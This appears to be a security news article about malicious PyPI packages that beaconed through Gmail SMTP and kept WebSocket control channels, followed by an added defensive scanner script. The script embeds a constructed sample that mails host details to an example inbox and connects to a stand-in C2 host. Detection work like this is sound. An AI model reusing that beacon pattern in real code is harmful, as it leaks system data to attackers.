Security researchers at Socket uncovered seven harmful Python packages on PyPI that abused Gmail's SMTP servers and WebSockets to enable data theft and remote command execution.
These packages, some of which remained on the platform for over four years, were removed following Socket's report, though one had already been downloaded over 18,000 times.
The packages carried hardcoded Gmail credentials and used them to mail system details to attacker-controlled inboxes. Outbound SMTP to Gmail blends in with legitimate mail traffic and is rarely blocked at the perimeter, which is the likely reason this initial beacon went unnoticed for so long.
After this initial contact, the malware connected to a remote server over encrypted WebSockets and kept the tunnel open as a persistent control channel. Through it the attackers could exfiltrate data, run shell commands, move laterally across the network, and harvest administrative credentials.
The email addresses involved hint at a cryptocurrency theft motive, consistent with similar historical tactics.
Users who installed any of the malicious packages—such as Coffin-Codes-2022 or Coffin-Grave—are urged to remove them and reset all affected credentials.
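The two checks a practitioner would want from the paragraphs above are (1) whether any of the named packages is installed and (2) whether anything in an environment combines the pattern described: smtplib, a hardcoded Gmail login, and a WebSocket client. The script below is an added example for this page, not Socket's tooling and not the packages' own code. It only knows the two package names the article gives (the report covers seven), the indicator heuristics and risk levels are my assumptions, and the two embedded source snippets are constructed samples, not the real malware.

```python
"""Triage helper for the PyPI/Gmail-SMTP report: check installed distributions
against the package names given in the article, and scan Python sources for the
smtplib + hardcoded-credential + WebSocket combination the report describes."""
import ast
import re
import sys
from importlib import metadata
from pathlib import Path

# Only the two names the article mentions; the report itself lists seven packages.
KNOWN_BAD = {"coffin-codes-2022", "coffin-grave"}

# Heuristic indicators (assumptions for this example, not published IOCs).
GMAIL_SMTP = re.compile(r"smtp\.gmail\.com", re.I)
WS_HINT = re.compile(r"\b(websocket|websockets|wss?://)", re.I)


def normalize(name):
    """PEP 503 name normalization so 'Coffin_Grave' and 'coffin-grave' compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


def find_installed_bad(dists=None):
    """Return the normalized names of known-bad distributions found in `dists`
    (defaults to everything importlib.metadata can see in this interpreter)."""
    if dists is None:
        dists = (d.metadata["Name"] or "" for d in metadata.distributions())
    return sorted({normalize(n) for n in dists if normalize(n) in KNOWN_BAD})


def analyze_source(src):
    """Return the set of indicator names found in one Python source string."""
    indicators = set()
    if GMAIL_SMTP.search(src):
        indicators.add("gmail_smtp_host")
    if WS_HINT.search(src):
        indicators.add("websocket")
    try:
        tree = ast.parse(src)
    except SyntaxError:
        return indicators  # regex hits only; not valid Python
    for node in ast.walk(tree):
        if isinstance(node, ast.Import) and any(a.name == "smtplib" for a in node.names):
            indicators.add("smtplib_import")
        if isinstance(node, ast.ImportFrom) and node.module == "smtplib":
            indicators.add("smtplib_import")
        # <obj>.login("literal-user", "literal-password"): credentials baked into the code
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)
                and node.func.attr == "login" and len(node.args) >= 2
                and all(isinstance(a, ast.Constant) and isinstance(a.value, str)
                        for a in node.args[:2])):
            indicators.add("hardcoded_smtp_login")
    return indicators


def classify(indicators):
    """Assumed scoring: literal Gmail login is the core signal, WebSocket raises it."""
    if {"hardcoded_smtp_login", "gmail_smtp_host"} <= indicators:
        return "high" if "websocket" in indicators else "medium"
    return "low"


def scan_tree(root):
    """Walk a directory (e.g. a site-packages) and list files rated above 'low'."""
    findings = []
    for path in Path(root).rglob("*.py"):
        try:
            src = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        ind = analyze_source(src)
        level = classify(ind)
        if level != "low":
            findings.append((str(path), level, sorted(ind)))
    return findings


# Constructed samples for demonstration; not code from the reported packages.
SAMPLE_MALICIOUS = """
import smtplib, socket, platform
import websocket
s = smtplib.SMTP_SSL("smtp.gmail.com", 465)
s.login("exfil.mailbox@example.com", "hardcoded-app-password")
s.sendmail("exfil.mailbox@example.com", "exfil.mailbox@example.com",
           "Subject: beacon\\n\\n" + socket.gethostname() + platform.platform())
ws = websocket.create_connection("wss://c2.example.invalid/tunnel")
"""

SAMPLE_BENIGN = """
import os, smtplib
server = smtplib.SMTP(os.environ["SMTP_HOST"], 587)
server.login(os.environ["SMTP_USER"], os.environ["SMTP_PASS"])
"""

if __name__ == "__main__":
    print("installed packages named in the report:", find_installed_bad() or "none")
    if len(sys.argv) > 1:
        for path, level, ind in scan_tree(sys.argv[1]):
            print(level, path, ind)
    else:
        for label, src in (("constructed malicious sample", SAMPLE_MALICIOUS),
                           ("constructed benign sample", SAMPLE_BENIGN)):
            print(label, "->", classify(analyze_source(src)))
```

Run it with no arguments to see the two constructed samples classified, or pass a site-packages path to scan real installed code. A "high" or "medium" hit is a lead, not a verdict: any legitimate utility that mails through Gmail with a literal app password trips the same heuristic, and a package that reads its credentials from config or obfuscates the host string will not. The name check is the only deterministic part, and it covers just the two packages this article names.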
A parallel case involving the npm ecosystem revealed a fake TypeScript package targeting high-balance crypto wallets, further highlighting the persistent threat from malicious open-source components.
